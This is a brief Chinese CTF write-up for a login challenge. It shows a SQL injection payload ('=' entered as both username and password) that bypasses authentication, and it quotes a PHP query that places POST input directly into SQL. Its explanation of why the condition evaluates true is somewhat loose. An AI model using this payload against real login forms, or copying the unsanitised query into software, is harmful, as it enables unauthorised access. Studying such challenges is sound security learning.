实验吧CTF 登陆一下好吗??解题WriteUp

实验吧CTF 登陆一下好吗??解题WriteUp_第1张图片

这个CTF​题目的payload真的简单到淫荡,看一下就是这样的

admin-> ‘=’

password-> ‘=’

真是醉了,为什么呢,类似这样的语句

$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;

如果我们按照上面输入就成了

$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;

user=”返回的是NULL=”也是符合条件的,最后就是

$sql = “select user from flag where 1 and 1”;

实验吧CTF 登陆一下好吗??解题WriteUp_第2张图片

你可能感兴趣的:(实验吧CTF 登陆一下好吗??解题WriteUp)